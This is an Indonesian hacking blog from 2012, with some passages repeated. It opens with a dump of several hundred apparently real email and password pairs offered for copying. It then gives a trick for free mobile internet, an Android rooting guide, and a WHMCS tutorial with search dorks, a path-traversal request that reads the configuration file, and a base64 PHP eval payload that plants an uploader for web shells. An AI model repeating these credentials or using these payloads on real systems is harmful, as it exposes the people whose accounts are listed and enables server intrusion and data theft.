Copy Semua IDS Diwah ini yee :D cuma segitu yg baru nemu ntar di tambah lagi deh :D
Follow -> @DetolCyber
albegianna@libero.it:ciglanus
esty48@hotmail.com:51151148
annadimit@hotmail.com:marianna02
cj_nash@yahoo.com:tara1234
george_ardelean@yahoo.com:094608687
divakarchalla@yahoo.in:chdiv1970
gopalclinic@gmail.com:ravigopal
farazahmedchughtai@gmail.com:flame2005
girijanookala@yahoo.co.in:nbr123
envyem@hotmail.com:zakiyya
hmgcarr@yahoo.com:collins
bchhapgar@hotmail.com:lata40
satyen108@gmail.com:shiv108
homo786@yahoo.com:pg1808
dominiquekernot@yahoo.com.au:cominghome74
chris@channel-uk.com:basilcat
virendralal@gmail.com:vic2000rit
hei-jinks@juno.com:froglegs
bmerwan@hotmail.com:BMBADMAN1236
smpeer2003@yahoo.com:biryani@50
dawnmills@me.com:majickdog
dorothy@leadafrica.co.za:BellaRosa1957
FreeSpiritEE@gmail.com:classy11
bubs_nelson@hotmail.com:domino
carmel_egan2003@hotmail.com:Thurston1
helenatobin@paradise.net.nz:louis123
banaswadi@bigpond.com.au:oscar1
balodi@gmail.com:66488csb
ejcmet@metropolitan.co.za:depress10n
deedashalev@hotmail.com:shalev6
pbkumbhojkar@gmail.com:shivani
brigita.bula@gmail.com:kukainitis1
hardeep60769@yahoo.com:simar123
brucebeal55@aol.com:annie123
drshikhasingh9@gmail.com:neelima
caradeeboyadzhieva@msn.com:jackamo1
gudrun@andartak.is:gu22un
rkshuklalko@gmail.com:allmighty
gphilip52@hotmail.com:sasha322
marigherasim@yahoo.com:elephant
floridakeysmom@hotmail.com:koa3mo
pashatilat@gmail.com:ghafuran
magginimmo@bigpond.com:nexus5
andwan-6@hotmail.com:cano6xm
annikaljungkvist@live.com:felix1
elaine.day@hotmail.co.uk:lucky10
chattigirl1216@yahoo.com:heaven55
farha.abidi@gmail.com:happy999
drnaveenwadhwa@gmail.com:radhyradhy
k_tania1@hotmail.com:kts874874
blessedbyfour@gmail.com:june1986
deborah@meehan.asia:Moyer1
sophia_gill01@yahoo.com:ilovekaranvir
kun_wagh@yahoo.co.in:diyami
genoved777@peoplepc.com:1914777
psubbu57@yahoo.co.in:anusham
faheemhadi84123@yahoo.com:6398984
harmit.raheja@gmail.com:simar9462
khalid.abbas20000@gmail.com:54001903
dm_padhy@yahoo.com:$kumood1
akhil_tyagi64@yahoo.com:sushant#
Kerzel@hotmail.com:Charlotte2001
dr.najam48@yahoo.com:5495760
jeneric00@earthlink.net:mohith
davidmarten223@gmail.com:scruffy223
bujjibabu74@ibibo.com:meghana
drtufail7@gmail.com:9050778
ndanestor2006@yahoo.com:niyonsenga
kvaid83@gmail.com:swisswatch123
bevlcsw@gmail.com:harry1
chirawa@comcast.net:1931indr
chantalandrews@gmail.com:rovercats1
carolineneville@yahoo.co.uk:avaflorence
ebonieknox@yahoo.co.nz:Ronald
elizamhecht@gmail.com:pw100100
dmhislop@gmail.com:bishops
khpitcairn@comcast.net:kritterkaker
herbalist36@hotmail.com:tlaloc13
deanmathers01@hotmail.com:mervjack
rrkinga@sbcglobal.net:tracking
kagidish@yahoo.com:zxas5214
robjus@bigpond.com:justine
nandu@nnassociates.com:madhuri1
Rowena@abelwellnesscenter.com:zhenikar13
sallysharpe@me.com:chetan
jules@smunet.net:ma57pa49
vivthegenius@hotmail.com:gettadogupya
trc.samtk@gmail.com:sam500
rameshmadan@gmail.com:ratnakar
suzimcewan@yahoo.co.uk:sherman
bhaskar.hari.gogte@gmail.com:kalpshree91
sirish1971@yahoo.com:turbo123
ravi@iiap.res.in:gttout1
rajjvikram@gmail.com:artisan
gsenturk@superonline.com:170799
karaneeva@yahoo.it:dream77
kschipps@bigpond.net.au:powerful
info@avitalelbaz.nl:notiya
scotty@scottydolan.com:woowooa70
rasmismi@gmail.com:harekrsna
tessa.masterton@orange-ftgroup.com:honeydog
ktsuda@sltnet.lk:mrkvale
davinciripatea@hotmail.com:pescarar
sajjad_hussan@hotmail.com:19KaKa32
ralphirani@hotmail.com:sansabil
saiprabha60@yahoo.com:satish
okiron36@hotmail.com:guinness
barrogill@googlemail.com:wick4me
northdublinhomeopath@googlemail.com:jupiter1
petercfrancis@hotmail.com:pedrof48
minhomeopat@yahoo.se:qwe123
BEMYREALTOR@HOTMAIL.COM:khan97
prafful.r@tatamotors.com:kashish
lindakaucher@hotmail.com:adamjesse
rachel_m64@yahoo.com.au:wwoman
donnah7002@aol.com:dh07704
domitian.pasca@yahoo.com:forever
roxroe@gmail.com:nang1982
Kerry@RikkisRefuge.org:DonateMore
kksingh_mrp@yahoo.co.in:qwertyui
q.ikram@yahoo.com:neelo1952
kerrie155@juno.com:penny2213
pangrish5@gmail.com:angrish553
ravij0000@gmail.com:ravishashank
drzeff@AOL.com:naturo
tlarson@cogeco.ca:dayril
ksrhompath@gmail.com:sampath29
nazmin_clinic@yahoo.co.uk:hasnain
subrata11486@gmail.com:9926848612
vsanpere@holistika.us:kilana
sabrandreth@hotmail.com:fabian85
pvnreddy1@yahoo.com:pvnr1947
sziashah@yahoo.com:shah7806
richard.van.egdom@skynet.be:29NOV1947
courtenayhealing@telus.net:inctcm
auribusteneolupum@talktalk.net:mayfield
KBlack68@aol.com:organic
willowb@blueyonder.co.uk:kingston50
nadapentaris@hotmail.com:calzetti
dr.samta@rediffmail.com:2262006
dr.bhupendra@gmail.com:parijatparijat
jalabaster@igrin.co.nz:amber3
vilp15@yahoo.com:babish
roshanmayan@gmail.com:rosh123mayan
kluptha@gmail.com:pavan2008
siddiquiyunus@gmail.com:shabana
rcb_hira786@hotmail.com:Plasma786
greatbiyi@yahoo.com:rector
rkpalta@yahoo.com:t4923482
toni.rangelova@yahoo.com:Herka1995
Ghazalashamsi@gmail.com:bismillah
conetimmy@yahoo.com:luvkat007
goyal_93719@yahoo.com:9814093719
islamic1212@yahoo.com:7095308
bad_tanveer@hotmail.com:mosa125
akashdeepg7@gmail.com:Pentium
nandhivarmar@gmail.com:whatd0umean
taakshaak@yahoo.com:2465878
JITU0061@GMAIL.COM:25021973
saer001@hotmail.com:pippin
faryad_raza@hotmail.com:fs90l2
harry@terrapi.org:wilderness1
raj02021963@rediffmail.com:veenaraj
bharat_shahui@yahoo.com:9220515969
alkagill@yahoo.co.in:ic24005x
dr4u08@gmail.com:littlegorgeous82
ranjeevana@gmail.com:quickfox
s.pura58@gmail.com:sanpur85
perecata@terra.es:peresegon
goyaa2004@yahoo.co.in:tirumala
pinak956@rediffmail.com:wrinky
gajanan_543@rediffmail.com:gan543
soundrenjith@yahoo.com:683557
sajita.amuthan@gmail.com:rapcce2k
ashk143@yahoo.com:ashkanuj
suriconsult@gmail.com:laundry
msarwar_rao@yahoo.com:sarfraz1400
nasir007ng@yahoo.com:kluxklan
rajeshmalaviya2008@gmail.com:69717484
abdemurshad@yahoo.com:kazim825
rajakumari_naidu@yahoo.com:bhb8551
cliffabhms@gmail.com:clifford
robn@inco.com.lb:LRFJrteP
rajeevkumartomar@yahoo.com:neelamm
okeflex360@yahoo.com:DOCTOR88timi0301
debmedina@prodigy.net.mx:deby1234
satinsethi@yahoo.co.in:zolo2008
thakurvijayk@gmail.com:9415691033
seerit@yahoo.com:training
tropixentertainment@hotmail.com:village
manojin24@yahoo.com:sigmund
javaidnaqvi05@gmail.com:vespa1978
salamhamid@hotmail.com:mahahamid10
freehealing@gmail.com:hrs1959
shahjahan1663@yahoo.co.in:mumtaazz
prasanna.dhal1963@gmail.com:prasanna1963
sathiya8@yahoo.com:hayagrivar8
duggalhk@gmail.com:050464
lise@hundehomeopatene.no:5entafs
senthi.sk1989@gmail.com:homoeopathy
golujaiswal@gmail.com:jj4201984m
christen.pappas@yahoo.com:mariana2
zaitoonalam@Gmail.com:masaababdullahalam
katemc003@yahoo.com:oceans13
dstrikha@gmail.com:jaimatadi9
sankisasankar@yahoo.co.uk:bharbimmu
bhavna13.jain@gmail.com:digamber
pearlharppy@yahoo.com:sanjaysri
kalla@emirates.net.ae:hk7550
shoshanasavyon@gmail.com:williebiggers
mansoor_127@hotmail.com:127rbb
veeranjaneyulumatcha@gmail.com:matcha123
navneety2k@gmail.com:nacd@man
marianne.inthesoup@gmail.com:icecream
melchrap@gmail.com:july20
valmiki_s@rediffmail.com:AO327EU1
drshifa2@gmail.com:kdeuppa
goyeche@shaw.ca:grutch
hinamohammed@hotmail.com:london21april
shazzfary@gmail.com:rukhsana
patrick@leaneco.se:torpare
howard_m_bender@sbcglobal.net:whitefloor
inrostad@hotmail.com:idarob
tariq_lateef2@yahoo.com:fujifilm
suresh.singlewatts@gmail.com:omgoodluck6855
kestabrooke@packagingcorp.com:jeffers
hala.elassy@gmail.com:iouluv
hosf@apm.org.br:hos122
ajaypinki10@yahoo.co.in:monika
barelrd@013.net:viva56
balank125@yahoo.com:13852511
stlyons@shaw.ca:March282007
siem@klokast.se:fexogz
ortegonmario@hotmail.com:dorado
njaanam@gmail.com:4500star
drfarooqaziz@hotmail.com:hank247
berkano@iafrica.com:petunia
nkumar28@gmail.com:yukotsujita
osati_f@yahoo.com:farz1334
veerabalaji@yahoo.com:vbjava10
nettan.kalebo@telia.com:sebnebe64
ereshkigal@abv.bg:060800
monjedseder@hotmail.com:monjed1987
farheen_fat01@yahoo.com:farroo7
raza_abdulkhader@yahoo.com:amatunnoor
susankempster@hotmail.com:koalas
lilleba@poodleinfo.no:150645
vanessa@herbsofgrace.com:beauty
whitewolfnz@hotmail.com:russell@ohau451
shfata@yahoo.com:farooqusman
cherylwiggill@yahoo.com:neville
sunil2309@rocketmail.com:personal
rcgarg5@gmail.com:jaibalaji
moprra@hotmail.com:indica
zms_2008_20@yahoo.com:zahidsheikh
zuesi60@yahoo.com:silly123
umendon@yahoo.com:bim02260
zarrinfard_ali@yahoo.com:toshibaa9
azedine_kozmane@msn.com:2010K2010
arshi.farooqui@gmail.com:arshi123
lmanske@gmail.com:sefrodba
julie2006@eircom.net:internet1
susierosie@bigpond.com:greynomad
vkelders@hay.net:lakehuron2
srisura1961@yahoo.co.in:sur12his
m_a_nishat@hotmail.com:safety
ebunculwin@hotmail.com:SeanaC1981
nita.shrm07@gmail.com:apnifamily
vikasg_nse@rediffmail.com:305064
lingeswari@hotmail.com:indira
bernico@aol.com:siamese19
lawai49@yahoo.com:jik6lzm
mks2210@yahoo.co.in:up65b5001
drsheetalmehta@gmail.com:prayer
lucienne.gaerty@gmail.com:21071010
kbhau@hotmail.com:kheliya5b
ssintl5123@gmail.com:hanumanji008
mely@iinet.net.au:dragan1807
abdconsulting@gmail.com:146525
dr.leelasoujanya@gmail.com:s8oujany8a
mithilesh7041@rediffmail.com:660170-l
mara@enq.ufsc.br:mgnq123
nr.james@gmail.com:cutter900
paunaranjov@yahoo.com:lucky88
joan.lewis-davis@hotmail.co.uk:letmein123
felicitydalton@yahoo.co.uk:thebump
sachinkumar_2@hotmail.com:school2000
fawadyousuf@yahoo.com:fds4108
teodielou@yahoo.com:teodie
debtoshdey@gmail.com:abba666
conchas@etb.net.co:cincohijos
ankit85_raj@yahoo.co.uk:mitarpyarenu
fizi_13@hotmail.com:shehnaz
kmr212@gmail.com:guruguru
arif_javed786@hotmail.com:similaras
ebasekic@yahoo.com:333333333
desmet.danielle@skynet.be:DA190467
monteiro.brian@gmail.com:sccb280652
annaevans54@yahoo.co.uk:SAPPHIRE29
rsparmar@nic.in:passed
siobhan_mercier@hotmail.com:molly25
aylamayc@hotmail.com:goodnightandgo
wanachea@hotmail.com:glassgo
Trinabell@rogers.com:1SmI3le5
farooqfaheem@yahoo.com:6750083
rosemarywilson@hotmail.co.uk:woody7
surinder27@rediffmail.com:65151165
pthrasher81@gmail.com:198108
drvjreddy@gmail.com:gopala
balbirkataria@yahoo.com:majgen1233
maheen.arab@yahoo.com:samir22emirates
swamideepak2003@rediffmail.com:mumbai
drmshahzad7@gmail.com:Muhammadpbuh
sarahwho@btinternet.com:tandycat
maria@justclick4.info:mac13496
sram214@yahoo.co.in:ram1248*
tenkku@gmail.com:Milford50
prakashrao99@hotmail.com:*sirisha99
joannenicolabamford@googlemail.com:joanneone
mmzahid787@hotmail.com:71450410
vinay.jabalpur@yahoo.com:redrose3456
juliaayzman@me.com:edushkadocha
marygeenz@gmail.com:sher3369
priyuvaidya88@gmail.com:pandurangvaidya
hazel.levine@gmail.com:gen1us06
info@janekelly.co.uk:deepseven7
lifedance@telia.com:livsdans
z.ali@eajb.com.sa:0555246107
navajonin@gmail.com:dan1el
rozcarder@yahoo.co.uk:pennyskye
tooter@nc.rr.com:sstooter
abhijit.padte@gmail.com:amp1234
nckvns@gmail.com:redcroft30
vsingh3@telus.net:bhavesh3
msrprasad4@gmail.com:saransid21
dipenroy@hotmail.com:debanshu001
shahg50@hotmail.com:alialiali
sattenkumar@ymail.com:9473238949s
maureen.holisticmedicine@gmail.com:kinesiology
rk_pruthi@hotmail.com:c538yvihar
pragya_sansthan@yahoo.co.in:aygarp
harigrastogi@gmail.com:pajama
Jdeleon@csbc.com:soledad
mde218@aol.com:pushkin
bhatta1946@gmail.com:124asprd
dr.deepaksharma84@gmail.com:21091210
ewa_bergman@tele2.se:56hundar
masud7@gmail.com:kyc*56_g/12-
ravinandal32@gmail.com:9896929091
asgar_ph@yahoo.com:had941deem378
alihaider_51214@yahoo.com:drgondal
scr2604@rediffmail.com:shailesh
psyche1@comcast.net:schultz
kat99_uk_2002@yahoo.co.uk:magiczack
cbrockmon@comcast.net:m00nstruck
drgmjee@yahoo.co.uk:0435810441
sharoncoffey@slingshot.co.nz:password24
igonaway@aol.com:idellita
gaile@brightandnatural.com.au:natpat
ramesh_shah592001@yahoo.com:devidas
9universal@gmail.com:1rssb1
sayeed@jawz.com.pk:jawzaccount
suronpulsifer@AOL.com:Dubbin
drshailesh_kale@rediffmail.com:sgk1012
ronitdhawan7@hotmail.com:gitamymom
shrikant_rajan@yahoo.com:goddess
cool_hotsagar@yahoo.com:personal
buddy_poonam28@yahoo.co.in:MYSUNHARI
nainavinayaraj@yahoo.com:prakriti
nakul_dubey@indiatimes.com:marutnandan
artis66.s@gmail.com:starks94
aruntkadam@yahoo.co.in:shweta
stone_rock6600@yahoo.com:rocksam
krithika_rk2008@yahoo.com:building
coolaqua26@yahoo.com:farmas
achint_soulmate@hotmail.com:flyingwings
latigid.s@gmail.com:tn025278
sarda_madhuri@rediffmail.com:28dec1980
sajaljain_86@yahoo.co.in:saritaanddineshjain
nammucool@gmail.com:namsha
atul_tndn@yahoo.com:sonali
adamo_48@hotmail.com:a5852a5852
deschar77@hotmail.com:jeeprubicon2006
ti_ben1234321@hotmail.com:paintball1
rjbarnes@eastlink.ca:kelbert
rikie87:06071987
alisha.walker@alaskaair.com:Ellie0609
sterling.stice@alaskaair.com:St.ice925
Sisi.Kailahi@gmail.com:malimali16
karl.stoltze@alaskaair.com:hanzzz
denalilady@yahoo.com:myjer62ry
jmesserrly@comcast.net:bigdig
bill.heppner@alaskaair.com:tacamo
tsikayaker@msn.com:Gliss711
deborah.abe@alaskaair.com:roseburg
JUSTINE.SOLIMAN@ALASKAAIR.COM:ty143jnd
Claudia.Modl@alaskaair.com:rellier
doug.kelley@alaskaair.com:lostit
Claudia.Modl@alaskaair.com:rellier
sully737@gmail.com:jacobson
momsfishlips@hotmail.com:sadie99
hollyportwine@yahoo.com:hollyp24
deborah.abe@alaskaair.com:roseburg
Leona.Wong@AlaskaAir.com:auburn
cindy.bredy@alaskaair.com:balance8
zarr@gci.net:river1
nancy.gazecki@alaskaair.com:assume16
mandy.j.moore@hotmail.co.uk:jacoblauren
contini.davide@libero.it:752814
costa.biagio@libero.it:42227550
crili88@hotmail.it:christian
eduardocannistraro@libero.it:eduardo121
ei.renatoleonardi@libero.it:3443234432
fabio@cucinenoventa.com:180882
fotocherchi@tiscali.it:pippo59
fran.todaro@yahoo.it:0981946068
galmarini.fabio@hotmail.it:sudomagodo
gavi.careddu@tiscali.it:kawasaki
gigidaga@tiscali.it:gigidaga
giorginocap@libero.it:helmut
mantagte@libero.it:mx5cup
michaelperron962010@hotmail.it:221196
mikomoto@hotmail.it:theevil
moreno.bertolotto@email.it:motoreno
protaper@tiscali.it:cross72
robisceddu85@alice.it:078145717
salvoracing84@hotmail.it:18021984
simone84@iol.it:12131415
tarruk92@hotmail.it:farouk
tizianazaretti@alice.it:17051978
wins81@tiscali.it:lorenzo
boston1104@zoominternet.net:kenworth11
casey037@msn.com:sober15
jkrn9508@me.com:jk9508
julieblackmon@me.com:abc123
Karenblack400@msn.com:danielle1987
lewondria@gmail.com:shiya2009
lsdejesus@gmail.com:erin01
nodari@terra.com.br:luiza03
cr@videantis.de:creuter
fantao@shu.edu.cn:19830627
urobese@gmail.com:geoff90
petebroccolo@sasktel.net:verycold
rohtw@kebi.com:rtw9212
mnelson6@hotmail.com:mnelson6
clipse94@gmail.com:elephant
adamr999@yahoo.com:pa55werd
alex-polli@uol.com.br:4613917100
funtime753@aol.com:heyfish
sunnyschan@hotmail.com:61120099
roman.lilligren@gmail.com:logitech
beutler1974@yahoo.com:drayton2003
HanYao1985@gmail.com:coolere2
rswilson923@yahoo.com:dick5rsw
skngan2@gmail.com:aohnt5
jtaka@cup.ocn.ne.jp:kite0916
newtongt@bol.com.br:paty1979
roguesw@gmail.com:mitsirs
blewis5150@yahoo.com:a7946118
etjeremy@hotmail.com:y3450056
lisaann50@gmail.com:pixie1
ok2000@hanmir.com:daskim24
backesgilles@vonet.lu:wlgy46
husse9@hotmail.com:miskin
N-larsson@hotmail.com:hejsan
tomas_p_g@hotmail.com:59945994
wub66@hotmail.com:noerror
martintheking@hotmail.com:pingis
rattan@bredband.net:terrakotta
wpkevin@hotmail.com:198376
dstart@163.com:hehehe
hackerzw@163.com:19830427
zhongbala@126.com:zhongyi
king_addison7@hotmail.com:8822920360
211@163.com:123456
nattyzs@163.com:er5783
Selasa, 20 November 2012
Senin, 12 November 2012
Trik Internet Gratis Menggunakan Smartfren 2012 (BUG)
kali ini saya akan share Trik Internetan gratis menggunakan modem Smartfren.
dari pada kebanyakan basabasi langsung saja ke tutor nya..
dari pada kebanyakan basabasi langsung saja ke tutor nya..
- Pertama-tama klik buka Smartfren Connex (seri apa aja)
- Trus klik Tools
- Klik Options
- Klik Network
- Pilih EDVO only
- Sekarang klik Apply
- Klik Ok
- Setelah klik Ok , Klik Connect
- Klik Call
- Masukan nomer ini *123*3*1*6000
- Klik gambar telfon hijau
- Tunggu sms dari operator
- Setelah sms dari operator masuk , Disconnect kan modem anda
- Lalu Connect kan lagi...
- SELESAI
Rooting langsung melalui perangkat
Alhamdulillah Berkat BAng De Vinclous AKHIRNYA Dapet jug Tutornya ...Makasih yah Saya Simpen Disini datanya biar GAk Lupa..
Untuk un-root, Anda bisa mencari file bernama unroot.zip, kemudian lakukan langkah-langkah yang sama dengan proses rooting di atas.
Rooting melalui software tambahan yang ter-install di Komputer
Cara kedua ini menurut Paseban merupakan cara yang lebih mudah dan sederhana untuk Anda lakukan. Paseban menggunakan software SuperOneClick produksi XDA-Developers, yang mana Anda bisa melakukan rooting atau unrooting Android Anda hanya dengan satu klik. Berikut langkah-langkahnya:
SuperOneClick hanya bisa untuk rooting perangkat berOS Froyo. Untuk perangkat berOS Gingerbread tersedia software bernama GingerBreak, namun Paseban belum mencobasoftware ini. Selamat mencoba! RY
-
Anda harus mencari file berbentuk ZIP yang umumnya bernama 'update.zip' atau 'upd_1.zip'. Biasanya, masing-masing perangkat membutuhkan update.zip yang berbeda. Anda bisa membacanya terlebih dahulu mengenai support ponsel update.zip sebelum men-downloadnya, kemudian lakukan modifikasi dengan cara:
"� Buka file hasil download (jangan di ekstrak!)
"� Buka folder "META-INF\com\google\android"� dan buka file updater-script dengan notepad.
"� Pada notepad Anda akan menemukan script getprop ("ro.product.device") == "tipe ponsel" dan getprop ("ro.build.product") == "tipe ponsel", ganti tipe ponsel dengan tipe perangkat Anda. Contoh apabila perangkat Anda Samsung Galaxy Gio, ganti "tipe ponsel"� dengan "GT-S5660"�.
-
Setelah itu pindahkan file update.zip ke SD Card perangkat Android Anda (tetap jangan diekstrak!)
-
Matikan perangkat Android Anda.
-
Nyalakan Android Anda ke Recovery Mode dengan menekan tombol Power+Menu secara bersamaan.
-
Pada Recovery Mode, Anda akan menemukan beberapa menu pilihan. Pilih apply sdcard: update.zip atau apply update from sdcard
-
Pada layar selanjutnya pilih file update.zip atau upd_1.zip.
-
Butuh 2-3 detik untuk meng-install update tersebut.
-
Setelah selesai pilih reboot sytem.
Untuk un-root, Anda bisa mencari file bernama unroot.zip, kemudian lakukan langkah-langkah yang sama dengan proses rooting di atas.
Rooting melalui software tambahan yang ter-install di Komputer
Cara kedua ini menurut Paseban merupakan cara yang lebih mudah dan sederhana untuk Anda lakukan. Paseban menggunakan software SuperOneClick produksi XDA-Developers, yang mana Anda bisa melakukan rooting atau unrooting Android Anda hanya dengan satu klik. Berikut langkah-langkahnya:
-
Cari dan download software SuperOneClick,
-
Install dan buka SuperOneClick,
-
Pada perangkat Android Anda, buka Setting-> Applications-> Development dan centang USB debugging.
-
Pada saat melakukan proses rooting menggunakan SuperOneClick disarankan Anda melepas SD Card Anda. Buka Setting->SD card and phone storage setting dan pilihUnmount SD Card, lalu lepas SD Card Anda.
-
Setelah semua setting pada perangkat Android selesai, colokkan Android ke komputer.
-
Lalu klik tombol Root atau Unroot.
-
Selanjutnya tunggu hingga SuperOneClick menandakan proses rooting atau unrooting telah selesai. (Pada saat proses rooting berlangsung, SuperOneClick akan menanyakan apakah Anda mau meng-install Busybox juga, pilih OK karena beberapa aplikasi yang bisa di-install pada perangkat rooted Android membutuhkan Busybox.)
SuperOneClick hanya bisa untuk rooting perangkat berOS Froyo. Untuk perangkat berOS Gingerbread tersedia software bernama GingerBreak, namun Paseban belum mencobasoftware ini. Selamat mencoba! RY
Kamis, 20 September 2012
Hack Whmcs Part 2
TAdi Udah Di Jelasin Cara Hack Whmcs Via
Submitticket .
Skarang Kita Lanjut Ke Next Stepp ..
Teknik Exploit Injection .
Dork Liat Di http://cyberscafe145.blogspot.com/2012/09/tutor-hack-whmcs.html .
Tapi Yang Dork Teknik Exploit Inject yahh ..
Oke Skarang Buka WEbsite nya ..
Contoh . :www.domain.co/whmcs/cart.php
Ganti Cart.php Dengan Exploit ini ->
cart.php?a=projectx&templatefile=../../../configuration.php
Contoh SS .
Contoh SS sesudah di exploit inject
Berhasil Seperti itu .. Tinggal Di PAge Source / CTRL+U . Akan Keluar Database nya . Liat SS
TinggaL CAri Dehh Phpmyadmin nya . Truzz Loginnn .. :D
Owned By Detol Seven Crew
And
Team Seven Crew
Skarang Kita Lanjut Ke Next Stepp ..
Teknik Exploit Injection .
Dork Liat Di http://cyberscafe145.blogspot.com/2012/09/tutor-hack-whmcs.html .
Tapi Yang Dork Teknik Exploit Inject yahh ..
Oke Skarang Buka WEbsite nya ..
Contoh . :www.domain.co/whmcs/cart.php
Ganti Cart.php Dengan Exploit ini ->
cart.php?a=projectx&templatefile=../../../configuration.php
Contoh SS .
Contoh SS sesudah di exploit inject
TinggaL CAri Dehh Phpmyadmin nya . Truzz Loginnn .. :D
Owned By Detol Seven Crew
And
Team Seven Crew
Tutor Hack Whmcs
Fromm All Member ..
Oke Kita Skarang Blajar Hack Whmcs ..Udahh Siap Semuaa .. Tapi Bentar Dullu Dah Pada Tau Belomm WHMCS Itu App ..Oke Yang BElum Tau Merapat :DNieh Tak Jelasin WHMCS Itu Appa ._
WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster karena dengan memanage yang mudah.
WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya.
fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING WHMCS ini ..
Oke Kita Mulai Siapin Bahan Bahan nya :
Hack Whmcs Itu Ada 2 Cara 1 . Dengan Metode Submitticet .2 . Dengan Metode Exploit ..
Dork :1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=
Dork Lengkap Untk Teknik Submitticket
#Injector : cart.php?a=test&templatefile=../../../ configuration.php
Kita Bahas HAck WHMCS Submittiket Dullu ya .. _
Ini Exploit nya . Taro Di Subject ya .->
{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJ Q0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R 1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2 RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0R Rb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3 Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyN WxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm 05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDh hVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxO MVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ2Rvd 25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/ php}
oke skarang Buka Google TAruh Dork .. Yang Diatas Untk Teknik Submitticket Kalo Sudah Buka Web yg TerPilih ( kaya Gubernur Aja Harus Dipilih :D )Contoh ss .
Jika Sudah Masuk
Liat SS nya LAgi .
Nah Kita Succsees Buat / daftar Submitticket ..
Sekarang Tinggal Buka Dehh ..
Contoh .: www.domain.co/whmcs/submitticket.php?step=2&deptid=1di
ubah Jadi : www.domaint.co/whmcs/downloads/indexx.phpHasil
Jadi Seperti Ini .
TinggaL Upload Dehh Shell Kalian .
contoh : www.domain.co/whmcs/downloads/indexx.php
Jadi : www.domain.co/whmcs/downloads/namashell.phpLiat SS : http://a6.sphotos.ak.fbcdn.net/hphotos-ak-ash3/578572_167735916697117_192801804_n.jpgOke
Sekian Dullu Ya . Teknik Exploit Inject Nya Lanjut Besok ....
Pegel Juga Yahh .. Hufttt Hadohhhh ... :D
Inti nya Jangan Putus Asa Bila Tidak Bisa CAri Target Yang Lainnnn ... :D
Owned By Detol Seven Crew
And
All Team Seven Crew ..
Oke Kita Skarang Blajar Hack Whmcs ..Udahh Siap Semuaa .. Tapi Bentar Dullu Dah Pada Tau Belomm WHMCS Itu App ..Oke Yang BElum Tau Merapat :DNieh Tak Jelasin WHMCS Itu Appa ._
WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster karena dengan memanage yang mudah.
WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya.
fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING WHMCS ini ..
Oke Kita Mulai Siapin Bahan Bahan nya :
- Kopi biar ga ngantuk
- Cemilan ..
- dan lain lain .. :D
Hack Whmcs Itu Ada 2 Cara 1 . Dengan Metode Submitticet .2 . Dengan Metode Exploit ..
Dork :1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=
Dork Lengkap Untk Teknik Submitticket
- intext:Powered by WHMCompleteSolution
- inurl:submitticket.php intext:Powered by WHMCompleteSolution
- inurl:clients/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:client/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:clientsarea/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:clientarea/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:crm/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:cp/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:manage/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:member/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:members/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:billing/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:billings/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:support/submitticket.php intext:Powered by WHMCompleteSolution
